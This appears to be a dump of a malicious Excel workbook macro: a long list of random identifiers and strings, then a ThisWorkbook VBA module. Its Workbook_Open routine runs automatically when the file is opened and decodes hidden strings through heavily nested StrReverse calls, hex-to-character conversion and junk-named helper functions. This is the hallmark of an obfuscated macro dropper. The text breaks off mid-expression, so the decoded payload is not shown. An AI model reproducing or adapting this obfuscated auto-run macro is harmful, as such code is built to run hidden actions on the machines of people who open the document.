ADvTjcLuwQtxLI:
vhwADvTxcLHwQGxLVEE:
String,
fndIRRQUsz
UPtIcvOJyenomrcUc:
String)
"VgDycdJQjr"
CosSGEwQNjGekgruKf
FhOgRVwVhbtqNjHA:
mitKahisPKo:
yhvUUvEQtMsPiHitnF
sZtHvclmkpNTaFSRhk
bHbhpeJSTRQuBImzyOSU:
oWZtWaolUhHHiqDfeD
kGflhsvKghrAvZoHcu:
PgvQENlgJLsLRaOu:
SOaesNPZjdGQpJdQMs
USYIPQnONeTQNnPvsbO
qiGVOyhjDgly
szGlyxNQTLkzscKMhJOc:
ONeTVNnPusbO
QiTYymkewtPl
nwwvAQelPdcsvyqOe:
eQeIVUlorjHQPz
qwPYMsoonrdjrHihx
MOYvcFVCIckZE:
"aSCknHko"
AgDViVTNfdz:
nSqIiITNgPmVhmjuLai:
CaGkzgmFNDjefd
"VnZdrpjByUr"
rgAqhvFoobNpKY:
qEaNQvqSUBVbjZENNMRo:
rDRzQCGhURLebyTsyuGYtvEOJnCUpICsYhhg
QzecKyTJAOZHHuu:
QakfIYrKeZNtCDBGrk
obbCKYzTyQoApgyvRBMSOarsN:
UZLELpCCRVYQoEvgOR
RBYHRYTgxLTUeBwcIOiqgLGHF
nfFTMvegBdiysboOOp:
PSKjyrbILgIMblGTGt
isNbOAcyxZGYJNoNaTm:
jzDFxQmeOwyS
bmrozQfnoxVPt:
TuFzROlHgYTgwLUeBwacIdiqfiihmIPQBONehkcAPIsbd:
yzxCngoRteuyAsRu
eFcaCkBnrQrCw:
zZZzIUxQwTmLmxrJ
jzDFxQmeOwySAOKtHghHQdFZDc
OFyJTDCppRZlOhNkDP
mnwVQtybiCKeaaYdPV
QcMFMrEDTQaRqFyiQSnP
SQwlicurOkI:
DvmSbbafQJQuHHXadV
Currency
pMwGMIUlmHJSqYBQx
igODXOFScMLaiuXqWt
GodxofsDmlZZAIUxQ:
MlCODAuMJhQbhdp
UQDQdlaFOPNSq:
WPWBbNcgjbAcIrncvm
gDkNeKQkshMIIGLxqxcC:
"yZYehZx"
PSKjMrbQLgQMblTTGt:
pddEMZBUAZqCqiAxTDOUQctuPQ:
wAmfmQddswzrPfY
nnKLUrZDSFYgWCvwyB:
QlhQeDDfnzcvbyQqQcV
PLXnDKMVsnRTAGZhWC
ZVPifBYwCyJN:
pOCAuMJgCbhq:
"gdFGcd"
paSbEgQhlnfE:
"hSjnphG"
TvflFNChddchSYgvXW:
VB_Creatable
uMJgCbSObrGcPZw:
jfrHQsgpMHlnT:
qiGVOyhjDgly:
oIzqEOxwkQxTgvc:
QxPBFfFQKdawS:
BNQfACLVQtJcwPJz:
Local
qePrNMoVnZDepjByUrPH
GVrfoLGkmSnsAqVe
dEbnBjAmqPEBv
dsKfytiNQYVbLELqD
DIVhBOCoPm
LjEdVRduIeRczuYZFa
SgTFhDCeLdOStSf
YQYCOOeilcBQ:
"uZQEtNEvI"
TQnJiokvzNjkuDy:
EivuKOQIixpaHJ
xzIRMqGZtM:
HUuuVerSmRqHiITNgOlU:
fQwZDBjYsj
uSwbZGvPTKZjRQEE
BxIapKxHfaDFlFLSIox
pMHlnTatBrQ
"UydbIRIzMQF"
sYsLGvbklj:
DIzYhzYcE)
knfDSLvdgAd:
mphFUNxfiCf:
wAOKtHhhHQdFZEcuTuF:
DIzYhzYcE,
CaGkzgmFNDjefd:
"DiOCY"
OuDECHfltQ:
eFcoCkBnrQFCw
lmkpahoEffuln:
iPtIpvOQLsnnmrcUc
YyUTwevhlKlw:
KiRcieqGHdfoLtVmSZApUQQPUFyFkKw:
kZEAAzDpvC
KxBbOMGZVsOntp:
GyQAfOKzTKBOZHHv:
KiDcieqtHdfoysVmEZ
UZyZkewtPmK:
SOaesNPZjdGQpJdQMs:
RYrzoTPPOSExEjJv
RMqsZfyGvbQQVb
jfrHQsgpMHlnT
kZEAAzDpvC:
KGvPFwKUDD
MSOaesNOZidGQpJd
VMmBueLOjLPeoIQJwQt:
"QdZlBCYaGoQ"
RtNJrFefGPbDXCasSs
KOdZIVvvQfr:
neDgLvrfAqhvFoobNoKY
zKcqyzIhbEGntMUK:
GodxofsDmlZZAIUxQ
BMSOZqrNPYycGWDJck
aQfpYYKKmuHjiGYkZVPifBlwCyJb:
HDORhCDNQRvKeyQ
VcvDtZTUSYIPQ:
"diMTyKKae"
erSmRqHTHFzROlUgmitK:
ZKOodaTmjGcAGCNRg
bHbhpeJSTRQuBImzyOSU
QpVzOvBUdSytusxib
bfiZyNGqYbvYcqmVj
AfsrHKNFftmQEG
GTSjnphGVN:
VB_Name
YQYCOOeilcBQ
KHBTRoYiokwMNjluRzds:
GFtgGdpElCptSGEyQNkG
EivuKOQIixpaHJ:
MgodIEEDItmtYykA
wRFPniLMtNS:
yDhttJNQIgyoYGJdGK
sQKoqQdwEuaU:
FNaCVBarRrwOyUEPVRduIQRczu:
HIScQAPjDVQG
(BlokE)
YOcmUUIIjsE:
pPbUnVtdntpBRhoqzQ
hEayqnyPeznw
MYMKEWTpZkpmwcdBKh
iMHCVdTMIIHMvpvbCn
ZBUzYqPqBvNwTDNTPcs
dEbnBjAmqPEBv:
wcQYVbLELqQCSQZQqS
QoYiokwMcjl
ASEIiVTNgdzVuAwHKav:
EhLJrgArivG
AyDpipTugvzCuSw:
TZJQYoOOeUQOoQvtbPkb:
bmrozQfnoxVPt
TuFzRAYHRYTgwLUeBwacIOiqfLGGFKvCJ
mtJkjzpskIm:
cTsHAkRUpRVkuPdPCezy:
ZxeHQDJdlbGBCAFqjr
PSKjyrbILgIMblGTGt:
zoTPPOSExEjJvORJiLqaVKfULakSSF:
ixpaHJfHLakESFsSp
RaqQPgVZQpSxvdRmdS
fJtpeypftDmmZLn
RQVszGlyxNQTLkzscKM:
uQENkfJLrMRZPuDECH
racwZerBQkYJlHGiPh
tVcjObaqtvoNcVFnpK
StrReverse(Mid(PdumDifjc,
OLuHhhIQeFaEduU
ndJEFDIsltXjAEGwXA:
rIGdyQdZloDZaj:
CZYzhylpOp
phGUNygiCfkx
kEhmzJfsgRt:
"UfojMcvPid"
QwFGEJhnuZ
ESdLLyyaivQqVuLYLJD
sNgaQyFFEJtmtYlkBE
SQxQjdvsOkI:
Single
Boolean
raaMNoxJmFk:
UPtIcvOJyenomrcUc
oonsdVdHUTk:
ogcnETpdmJEikQkqyn:
GRjxFGPojLNuATcRx:
FKYUDQqqRa
ASEIiVTNgdzVuAwHKav
erfQsONpQoaeEepjB
BrQfgejGNUzLLb:
mtMTJpkljoagnEfe
"okwcjluRMqs"
kneDgLJrgAqhvF
AMPeABKUPtIbvOIy:
UqPHDOgvQENlgJL:
LkqmyBPlnwGBe
URoYjolwNOkluSzdntMUJpllkoaSaEfQ:
zrQfYIqsMpuHEnAaa
mBteLNjLPeaIQvwQgs
PfildCfKtpeoftEmmZ:
Public
pFwhQSmPUheNaAAbjv:
obbCKYzTyQoApgyvRBMSOarsN
hxBEvUkdMuw:
LvrgAqhvFooNpLYmTlQbA
YxMFpQauQbplUiH
UAHbjYDzzxCouBStsIy
ChutJMPHgvoYGI:
giCfkyudqPQrAMo
mgyvSoMSObesNZjeGQpJdQMsBBAFqjq:
QlhQeDDfnzcvbyQqQcV:
QakfIYrKeZNtCDBGrk:
wvLORJjxqbIKfHMa
YOcmUUIIjsE
OqYpbfFfqkCAQsQJFQ:
"iEoEAMefA"
sPKopVdvDtZ
TqMlrnyCQmoxGBfvNiBv
wFPKoDQqJEtZijhmQ
FNDjrsqvSahKYQnrul
hEayqnyPeznw:
FhOgRVwVhbtqNjHA
lxxNQTLkzscJMhJNc:
ciepGUdeoLGklRZrzpU:
yKcqLzIgbEGnHMUK:
fyGwcQYVbLELqQCSVZQp
MnKWkSjVZnkevtRmLR
RtNJrFefGPbDXCasSs:
ADGyQmfPxzTw
AlBFIzZBhQMAVLCQbJJw
"JRe"
vZoHcupeJSTRQHBImz
KqOgFgrlDnJtE:
FbzsozQgBoy
PmUwNtATbRvrrqygZg
ZVPifBYwCyJN
Mid$(yvofgTHeW,
KembHCCBGryFVwvLBE
gOcBBdmyauZx:
zHwclmkpMSaERQhln
LdrzAJicFHouNVL:
FgGRLeMjSekgrIYf
rfAqhvFoobNoKYTlQbApmgyvRo:
HnijhmQPQBcNehkcBeI:
wcllkoaSaEQQgknfD
RQVGNUlLKbQTLkNsqYM:
SgHbGfwIwuoGDaJUb:
TZJQYoOOeUQOoQvtbPkb
wMNjluRzdsZfyGvc
FtrlDAQGRYTfwxTeBiLbHOhpfKFGEJuov
roKgExtEVlGtDbVzBhBH:
gYwaECkZtkoyihUUvEQt
nLeDepjBkHrBHDPgv:
VdwEtZUUSYJPQ:
xyIgMqGmtM
"wBZfmQdt"
tBrQfgejGNUzL:
yKcqLzIgbEGnHMUK
MHIGLwDKbCBRHKB
MOYvcFVCIckZE
GhPuSkvkictrOwIOKW:
LvdgAdhvFbobNpLJmTl
DknIkoDNiyiVvTRtbs
LjEdjfruIegpzuQnFa:
VOVANMdgjbzOracwZerBQkYJlHGiP
BlokE
rgAqhvFoobNpKY
mnwVQtybiCKeaaYdPV:
QaaYdOHOtFFU:
nMnysKHfAZQN
DQbKJxxZhtVpUsKQKI:
eIGodxofsDmlZZA:
xIapKxHfaDFlFLSoxywBZfmQedtwzrQf:
UxQwTmymkewtPzKPMpqLMVubETAGaiYDyzxCn
BYwCyJNcxzI
dLLylMjvJrIuyYMJDVS:
BBAFcjqUihxAD:
erfQsONpQoaeEepjB:
pCMvvjUwSftbsei
"BqKArFPyy"
aQfpYYKKmuHj:
FbzsozQgBoy:
ogcnETpdmJEikQkqyn
tRvaYFuOEvJTCCp
jzprjIlPNwkFmAKttggHPdEYDc
UuUgarpMhGutLZuirQ:
oTrJjJUOhPnQhnjvLbi:
paSbEgQhlnfE
nnKLUrZDSFYgWCvwyB
VB_PredeclaredId
OsubvAIyennmqNUcGSS:
oIzqEOxwkQxTgvc
GyQAfOKzTKBOZHHv
KiDcieqtHdfoysVmEZ:
ENlgJLsyRaOuqqpu:
uvtykdkObaqu:
IqsMpuHEnAaaBJQySxVnoztLuRBLRNZqFMOYvq
wLmHlKbCcnhAiFoAGC:
LwsgAriwGpo:
"PzJPLpDLMVtoRTA"
"ESwegAdivs"
LcrMAJhcFHoHNVKqzA
dqePrNMoVnZdDepjB
qqePrNaoVnZdDroiA
wuRnMEAMcrNBKhcGIo
ovammBFIAZoQyBVyCQNwJj
qEaNQvqSUBVbjZENNMRo
nSqIiITNgPmVhmjuLai
ZRZDQPgkmeDSK:
eVuYCAiQrh
MYpDZMQupSTAUaiYDMM:
AcyKZGYJNncZSliFbz
nMnysKHfAZQN:
ixpaHJfHLakESFsSp:
JoOAPTQNnPvfbPka
"ZMmxrJGezY"
mVjIIjsEhAgDV
ZxeHQDJdlbGBCAFqjr:
yzxCngnRfeuyA
QxssrwhahL
zvHZnvwFeYBDkq:
rycDoEILCcEkTPE
YrXyNnOZTlUqalrnQf:
lVmqskJmQBxlFwnBLuu
VB_Base
wAmfmQddswzrPfY:
yzxCngoRteuyAsRu:
VrPIEPhvQEOmhKL
xSrxtFIQsu:
LvrgAqhvFooNpLYmTlQbA:
BNQfACLVQtJcwPJz
sPiuigaspLvFLHTlmH:
VcvDtZTUSYIPQ
CPMvIiiJRfGbFev:
oNdVFnqKnrFPky
yGHFKvpwanmCGJAapiRz
FDlaulbpziiUVwF
VMmBueLOjLPeoIQJwQt
"MPfABK"
psMptHRnAnaBYVygx
xFvbkkinKRZDP:
MuLxBcCNHaQt
uIeRbztQZF:
FNaCVBarRrwOyUEPVRduIQRczu
MesNBKjeGIpJOQM
zvHZnvwFeYBDkq
sZtHvclmkpNTaFSRhk:
OFTeMMzmMjwKsJvzZNKE:
QuwcwCJzfopnsPVdHUTk:
UxQwTmymkewtPzKPMpqLMVubETAGaiYDyzxCn:
UaKRZpPOfUYPoRwucQlc:
cwvZHYKOnOZTliGbAr
QwFGEJhnuZ:
TqCQyPBFfTQKd
LakSRFrSpBPxOBFfSQKd:
IFcyQOKQoCYLU:
rrSbnPjOmEeEPJcLiRdi
knfDhLvrgAq
USYIPQnONeTQNnPvsbO:
MhAukPZZYdNGNs
KjPtIpvOQMsnomrcUc
ipIPFlghfkVOVAbM:
YyUTwevhlKlw
DHKCbEjSODYNE
uzNYsFtfGdcDlCptStE
iGYkYVPifBlwCyJb
AfsrHKNFftmQEG:
ndJEFDIsltXjAEGwXA
IqsMpuHEnAaaBJQySxVnoztLuRBLRNZqFMOYvq:
bAbmgyvSoMEBMesNBKje:
sYsLGvbklj
EplZukbpzi:
dfzchuFanbMoKJ:
ECHsltQkjzDFxQme
KVaoJLUfZCSlFZSIox:
aiYDyzxCnuBRssHxAs
UZyZkewtPmK
fyGwcQYVbLELqQCSVZQp:
JFtNEvJTCBpcCZlzhylp
wtnFDavTaVilzVQgq:
yzxCngnRfeuyA:
"ufYg"
cBHDOSgCENXRuLdwRL
ZFMfndIDECHszGQyxNDG
yiJfsHoGryVKHBTQmJ
FgrlDAQtRJF:
oCBRUXPnDygOQkNSfc
xyIgMqFmtL:
"CcdD"
fKSTRQIBImzyO
LnpWqyEtZiihmJQXCP:
ZFMfndIDECHszGQyxNDGQzecKyTJAOZHHuu:
yYkewfBlwCyJbqxyIgbE
ihxADvTjcLuwQtyLVrEeFcbCkBnrRrCw:
UqPHDOgvQENlgJL
oRhzTnhQCLMKPA
RgBDMQRuKdxQKAgppo:
jxSGPniLNuOTcRxGGEJ:
"phGVygiDfkyId"
CyKbcxzIgMqGntUJpllkoaSaEfQhknfD:
LfZOuDECHslsQ
NqUSApJArEPyxllM
CyKbcxzIgMqGntUJpllkoaSaEfQhknfD
oTrJjJUOhPnQhnjvLbi
TuFzRAYHRYTgwL
mVjIIjsEhAgDV:
BnrRrCwOLjEd:
DIVhBOCoPm:
DLYATzQpOp:
scYNhYOcmVVIuWsFTB:
oonsdVdHUTk
nLeDepjBkHrBHDPgv
CmxCzKcdyzI
oAdwcAReRPJZvfqwsDUVr
EktusxUbiMaZpsvnMb
FTprAKFjyQlEyoTd
wZsYvNnNZSlU
nyhgTTvDPs
nYQYCdOfild:
wRFPniLMtNS
jbQjAOkYhEzdfLglt
tRvaYFuOEvJTCCp:
HggHQcFYEbtTtFRBXH
RduIeRczuYZFafndIRRQ
UQDQdlaFOPNSq
wZsYvNnNZSlU:
CmxCzKcdyzI:
AgDViVTNfdz
dfzchuFanbMoKJ
VOVANMdgjbzOracwZerBQkYJlHGiP:
"xvdRmdThr"
cmHUHuVsqSARDHiHSMf
JFtNEvJTCBpcCZlzhylp:
"OQaxsVY"
erSmRqHTHFzROlUgmitKvwFdKoDkqJ:
tJClTWqTXlyReREfCA:
nomrcUcGTSj:
rycDoEILCcEkTPE:
LjEdURduIeRbzuQZFa:
QuwcwCJzfopnsPVdHUTk
VdwEtZUUSYJPQ
PLXnDKMVsnRTAGZhWC:
YuepuqCTiqrAZ:
QaRqFyiPSnPTieNbAAc:
DoEvents
TmymkewtPzKPMYqLMVubETAGaiY:
CxbdJPjrgLH:
EbKVbYjABQYhFmPfLR
uSwbZGvPTKZjRQEE:
"TcoQknFRFDxPMj"
dnVVIIktFhBgEQiQTNg
LsMRaOvDECHfmtQkjzD
SQxQjdvsOkI
"QIMnNZS"
LRaOuDECHflsQ
NytiCtkxIrqePrNa
tQLprYexFvbV:
cYjBQlZiGBegNgmujP
VB_TemplateDerived
rQrCwOLjEdUR:
VFPVReuvQSczhJa:
GASBYHSZUgxMTV:
"iFpzFBetACLjeH"
GprLotGDmzZZAIVxRwUm
aNNoxJmFlIbnbZS
JCJoBAQTQOnCvfNPkMRf
scYNhYOcmVVIuWsFTB
StsIyBtRvaYFuOEvJT
DHKCbEjSODYNE:
ZRZDQPgkmeDSK
MYMKEWTpZkpmwcdBKh:
fpYYKxYuHVDUGKkZVPi
besNPZjeGQpJdQMsBB
oRhzTnhQCLMKPA:
FqjqUihxADvTjcL:
MnKWkSjVZnkevtRmLR:
afspYlKKmuHjCiG
oRteuyAsRuZFtNEvJTCBpcCZlzhy
TuFzRAYHRYTgwLUeBwacIOiqfLGGFKvCJ:
SkVaAbmgyvRo
ssTcoQkPoFRFDxPM:
HUuuVeqSmRqHhHSMfOlU
oNdVFnqKnrFPky:
wOyUEPVRduIQRczu
AmCFIAZChQ:
wtnFDavTaVilzVQgq
NsFEUZbSsHzkRToQV:
mtMTJpkljoagnEfe:
JOcZHUuuVeq:
gjbzcHrncw
tCPqKpOfGfqlDmJsEK
tBrQfgejGNUzL
mcHQQPUFyFkxw:
FqjqUihxADvTjcL
sPKopVdvDtZ:
"OSVMmB"
"NsSETYb"
isNbOAcyxZGYJNoNaTm
nfFTMvegBdiysboOOp
PRmOThsMaNzbxwY
raaMNoxJmFk
ihxADvTjcLuwQtyLVrEeFcbCkBnrRrCw
DknIkoDNiyiVvTRtbs:
tDJFRijEGPnUxNuAT:
RhZJrtNqvIToBp
mHvEcQACjDIQFmuvtyVd
wQtyLVrEseFcbC:
iZyNGqYbvYc
MSghprinR
aLsuPrvLHpDcdENZCV
mwffRStCOrKpNgsgdQpm
vCJaAAPFIAZChfMBV:
dhGusmEBYuSZUgjy
mBteLNjLPeaIQvwQgs:
FgrlDAQtRJF
QzecKyTJAOZHHuu
qePrNMoVnZDepjByUrPH:
xYhtVpUsKkKVPiQoY
Chr$(Val("&H"
fjmeCRKucfzcguqanM:
SEIiWTNfcAVtAyILZu:
LakSRFrSpBPxOBFfSQKd
BVMDQbJJxxYhtVpUsK
NrGntMUKqlm:
knfDSLvdgAd
gOcBBdmyauZx
IfrFnEquUIF:
kneDgLJrgAqhvF:
mRqHiHSMfOlUgmitKZh:
GPKoEQrKEuaijh:
UqOUQdguQRblgJZ
JoOAPTQNnPvfbPka:
nhzwSpNTPbetO
LoFlrLTInjjimYRYDd
vFbobNpLJmTQbAbmgyvSoME:
dzMbHaLPpdbUnkGd:
GRjxFGPojLNuATcRx
kOnFfFQKdLjSdjfrHQe:
fqZYLLnvHkDjGZlZQQj
"QxQjdvsOk"
eQeIVUlorjHQPz:
wySvAOZtGuhHedEmDq
pddEMZBUAZqCqiAxTDOUQctuPQ
AilFimAKgtgStPOrZqc:
GjnBxguTTuDPsLrO
VnzolfxuQALRNZq
MnbZSliEazEBMPfAB:
ZwdGQDJdlaFBBAEqjq
dBtqBShCqzYRvxeyD:
bTPbsGdPaxsVQDYdlb
utJzCuSwbZGvPFwKUDD:
BAEqjqUhhwADvTj
SQwlicurOkI
RBYHRYTgxLTUeBwcIOiqgLGHF:
NPwCVeTzuvtyjqxN
RhaJruOrvJGpCc:
uIeRbztQZF
HDORhCDNQRvKeyQ:
OcnVUIuVsESAREIiVTNg
lBEHzYngQyAU
"QzDRcw"
gDkNeKQkshMIIGLxqxcC
OrICIbjZFABNSDyDhI:
dBtqBShCqzYRvxeyD
PSKjMrbQLgQMblTTGt
rrefFObCQBasDspjB
TlQbApmgyvSo:
ADvTjcLuwQtxLI
ogGVNwfhDfjwIcqdQq
glyIerfQsONpQoaeEe
TjcLuwQtxLIrEe:
CAuMJgCbhdorGcdnwrkDYqlaFOPNSDxEivuKOR
FimAxgtSSuCO
zbxJYFQINnbZSliEbzE
nysKtPzKQMYpELMQup
"yuFQYuEcIm"
String
bnbYRkhEoyEAMdezB:
jbQjAOkYhEzdfLglt:
EAMdsNBKidGIpIOQLr:
QhnsRALDv
IfrFnEquUIF
CPMvIiiJRfGbFev
eFcaCkBnrQrCw
tJClTWqTXlyReREfCA
RQVszGlyxNQTLkzscKM
"wzOluE"
FtrlDAQGRYTfwxTeBiLbHOhpfKFGEJuov:
zoTPPOSExEjJvORJiLqaVKfULakSSF
qiGkOMujDtky:
KGSkyGHQojMOvBUdSy
HtUqpRQDHgHSMebwUs
VCIckZEAAzDpvCTutJz:
"lhvKghr"
nhzwSpNTPbetO:
iuJqItwYMJDVSDZwEA
FeYBDkqJRHnijhQelBccrikcBe
LnvHkDjGZyZkewgCmx:
wcllkoaSaEQQgknfD:
bmpFablupTiCWojYFN:
dLLylMjvJrIuyYMJDVS
"jrDgzfC"
roKgExtEVlGtDbVzBhBH
dTtuswjpvNonEtvnNp
uvtykdkObaqu
iEbzrnzPfAoxUPtv
tKNQIgKoYUJdUKYiRR:
EeeFNaCVBarRr:
FcLQcZkBCYZiGnQgM:
OqYpbfFfqkCAQsQJFQ
MRaPvEEDIgmtYl
OewQkeTzIJHMqxcpoEHKCcqjTBDAFSdyLzlMjiJrQIMmMYR:
SkVaAbmgyvRo:
nYQYCdOfild
nysKtPzKQMYpELMQup:
nTbtBrQRSQVGAHlMxNRU:
GPKoEQrKEuaijh
UAHbjYDzzxCouBStsIy:
UHiERgMfQUugaspLiGMITQ
UeBjMcIOiqgLGGFKvov:
UeBjMcIOiqgLGGFKvov
fClKQMYoELNWtoSUBH
lNsdZMiYOdnVVIvVsF
jxSGPniLNuOTcRxGGEJ
LXRigDYvplvOclyTOr
HLaVESrsSco
PMYbqLMVgbETnGaUJ:
HIScQAPjDVQG:
aQfpYYKKmuHjiGYkZVPifBlwCyJb
fULakSSFsTqCQyPBFfT
IdTYlyRefSsPOqlDos
nomrcUcGTSj
GhPuSkvkictrOwIOKW
fyGwcQQVbLSaqQQgVZQp
xzIRMqGZtM
kEhmzJfsgRt
erSmRqHTHFzROlUgmitK
bnbYRkhEoyEAMdezB
BhpqotfYfJVUlpsjIY
DvmSbbafQJQuHHXadV:
occDLYATzQpBphzwSCNSPbstO:
vuVDUGKlLQQjgCYxplwN
zzyCahoSffuyB:
EplZukbpzi
mitKahisPKo
TlQbApmgyvSo
"YBONeikcB"
HZnIwGeZCDkEJR:
IjsEhAgDVvVhbtdzj:
qiGkOMujDtky
ItbdyaftDYmZLmIHkQi
QZmNiMlCODAuM:
"hJdIgyKywq"
Integer
mukPKLJOzszeEqGKMEe
RHnijhmQelBccrikc:
qqePrNaoVnZdDroiA:
mnlqbipFggwmoFiMKshBsjwH:
EUZbSsUzkgTpfVkuddP:
jzDFxQmeOwySAOKtHghHQdFZDc:
OkmvFAetLgztjOY
qiHVOzhjDglyv
trwhovLnmCsumL:
KqOgFgrlDnJtE
dzMbHaLPpdbUnkGd
kOnFfFQKdLjSdjfrHQe
LfZOuDECHslsQ:
TuFzROlHgYTgwLUeBwacIdiqfiihmIPQBONehkcAPIsbd
SDwDiJuKOQIiKpaUJe:
LnvHkDjGZyZkewgCmx
"vByenomrOU"
TqCQyPBFfTQKd:
zKcqyzIhbEGntMUK
Error
AMPeABKUPtIbvOIy
yYkewfBlwCyJbqxyIgbE:
SMTxZJaegYx
SekgrIJfgqNu:
wyflEMCidechRZgwQQm:
FTprAKFjyQlEyoTd:
hPPCCenzbvayQcQNHaQu
eIGodxofsDmlZZA
QZmNiMlCODAuM
mcHQQPUFyFkxw
Attribute
uEnnaaBJQyS
QbApmgyvSoMS:
ZFMfndIDECHszGQyxNDGQzecKyTJAOZHHuu
QNkGfQSfvKgTdAv:
OLuHhhIQeFaEduU:
pPbUnVtdntpBRhoqzQ:
HLaVESrsSco:
ONeTQOnQvtbPkQfpYYKKmuH
oNNpxKmGlJbBcnh
psMptHRnAnaBYVygx:
EeeFNaCVBarRr
OiNmDeDOIbKh
VjiyCEwVldNvx
szGlyxNQTLkzscKMhJOc
qRbnOjNmEPEBv
nwwvAQelPdcsvyqOe
"QBONehkcAIsbdxafsp"
"sFPyymzViwevhlLz"
fJtpeypftDmmZLn:
PtIcvOJyenomrcUdGTSj
hxBEvUkdMuw
uRBLRNZqFMOYvqTVCI:
wHBTCZITaVhyNUQgDyce:
JYFQIMnbYRkiEay:
QnuBgtsILOGfunQFHc:
FKwCJbBAQGJBaDigN:
hisPwaqVdvDtZTUSYJ
MesNBKjeGIpJOQM:
ECHsltQkjzDFxQme:
NsFEUZbSsHzkRToQV
Function
AlBFIzZBhQMAVLCQbJJw:
litKZhirPKn:
riyHpoccEMYBUAXpCp
jzDFxQmeOwyS:
gkJxvpHEbxVcYj:
QaaYdOHOtFFU
KVaoJLUfZCSlFZSIox
vCJaAAPFIAZChfMBV
sPiuigaspLvFLHTlmH
ENlgJLsyRaOuqqpu
RhZJrtNqvIToBp:
ZFMfndIDECHszGQyxNDG:
odxofsDmlZKmIU:
SMTxZJaegYx:
KGvPFwKUDD:
JplljoaSaEfQgknfDgL:
bfiZyNGqYbvYcqmVj:
bAbmgyvSoMEBMesNBKje
cwvZHYKOnOZTliGbAr:
"TuQsZ"
LjEdjfruIegpzuQnFa
mlBEHzYngPyAUxBPMvIi
Double
nQSzTZhQCLLJOm
odxofsDmlZKmIU
wLmHlKbCcnhAiFoAGC
GcXcZknDYZisnRgATm
IdTYlyRefSsPOqlDos:
RHnijhmQelBccrikc
QiTYymkewtPl:
lgIKrxQZOupqotelsI
UaKRZpPOfUYPoRwucQlc
chRKRwJIZcQvKDnVYsUan:
TSjnphGVNygiCfkxI:
OYYVbyFMrDD
pMHlnTatBrQ:
RQVGNUlLKbQTLkNsqYM
xyIgMqFmtL
FKYUDQqqRa:
drBkkQJlGTiP:
wyflEMCidechRZgwQQm
iZyNGqYbvYc:
besNPZjeGQpJdQMsBB:
GASBYHSZUgxMTV
vhwADvTxcLHwQGxLVEE
AzPFIAZChf
zzyCahoSffuyB

VBA Code

Attribute VB_Name = "ThisWorkbook"

Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

Attribute VB_GlobalNameSpace = False

Attribute VB_Creatable = False

Attribute VB_PredeclaredId = True

Attribute VB_Exposed = True

Attribute VB_TemplateDerived = False

Attribute VB_Customizable = True

Sub Workbook_Open()

BlokE1 = QhnsRALDv(StrReverse(SN2APmbS0(DZfiJRzM5(vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("3A33"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("33"))))))))))))))))))))))))))))))))))))), StrReverse(StrReverse(SN2APmbS0(SN2APmbS0(DZfiJRzM5(vnf2pkQbq(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("3737"))))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("34"))))))))))))))))))))))))))))))

BlokE2 = QhnsRALDv(StrReverse(SN2APmbS0(DZfiJRzM5(vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("3B47"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("34"))))))))))))))))))))))))))), StrReverse(StrReverse(StrReverse(SN2APmbS0(SN2APmbS0(SN2APmbS0(DZfiJRzM5(vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("393F"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("36"))))))))))))))))))))))))

BlokE3 = QhnsRALDv(StrReverse(SN2APmbS0(DZfiJRzM5(vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("3B4A"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("35"))))))))))))))))))), StrReverse(StrReverse(StrReverse(SN2APmbS0(SN2APmbS0(SN2APmbS0(DZfiJRzM5(vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("393C"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("36"))))))))))))))))))))))))

BlokE4 = QhnsRALDv(StrReverse(SN2APmbS0(DZfiJRzM5(vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("3845"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("31"))))))))))))))))))))))))), StrReverse(StrReverse(StrReverse(SN2APmbS0(SN2APmbS0(SN2APmbS0(DZfiJRzM5(vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("393F"))), 